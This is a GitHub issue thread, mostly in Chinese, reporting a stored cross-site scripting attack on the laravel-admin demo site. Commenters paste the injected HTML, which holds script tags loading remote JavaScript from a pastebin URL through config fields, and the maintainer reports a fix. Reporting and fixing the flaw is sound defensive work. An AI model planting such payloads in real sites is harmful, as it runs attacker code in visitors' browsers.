### ISSUE TITLE
Demo站被黑了？

### ISSUE THREAD

**Issue by codejam1024** [z-song/laravel-admin#2191]
http://laravel-admin.org/demo/
后台导航点“Config”的时候会弹窗

**Comment by dynamohuang** [comment]
</td>
                                <td>
                    <a tabindex="0" class="btn btn-xs btn-twitter" role="button" data-toggle="popover" data-html="true" title="Usage" data-content="&lt;code&gt;config('pc.wina&lt;script type=" text src="https://pastebin.com/raw/vUMVU2bW">');"&gt;pc.wina<script type="text/javascript" src="https://pastebin.com/raw/vUMVU2bW"></script></a>
                </td>
                                <td>
                    &lt;script type="text/javascript" src="https://pastebin.com/raw/vUMVU2bW"&gt;&lt;/script&gt;
                </td>
                                <td>
                    hhhjkhjkjkjkhkhkhkhkhkjhjkhk&lt;script type="text/javascript" src="https://pastebin.com/raw/vUMVU2bW"&gt;&lt;/script&gt;
                </td>
                                <td>
                    2017-09-26 15:27:22
                </td>

**Comment by dynamohuang** [comment]
some one input some fucking xss ！   @z-song

**Comment by dynamohuang** [comment]
插入脚本为
<a tabindex="0" class="btn btn-xs btn-twitter" role="button" data-toggle="popover" data-html="true" title="Usage" data-content="&lt;code&gt;config('pc.wina&lt;script type=" text src="https://pastebin.com/raw/vUMVU2bW">');"&gt;pc.wina<script type="text/javascript" src="https://pastebin.com/raw/vUMVU2bW"></script></a>

**Comment by dynamohuang** [comment]
插入脚本为 `<a tabindex="0" class="btn btn-xs btn-twitter" role="button" data-toggle="popover" data-html="true" title="Usage" data-content="&lt;code&gt;config('pc.wina&lt;script type=" text src="https://pastebin.com/raw/vUMVU2bW">');"&gt;pc.wina<script type="text/javascript" src="https://pastebin.com/raw/vUMVU2bW"></script></a>`

**Comment by dynamohuang** [comment]
测试了laravel5.6暂安全

**Comment by z-song** [comment]
fixed

**Comment by dynamohuang** [comment]
@z-song  能透露下修复方式吗 感谢
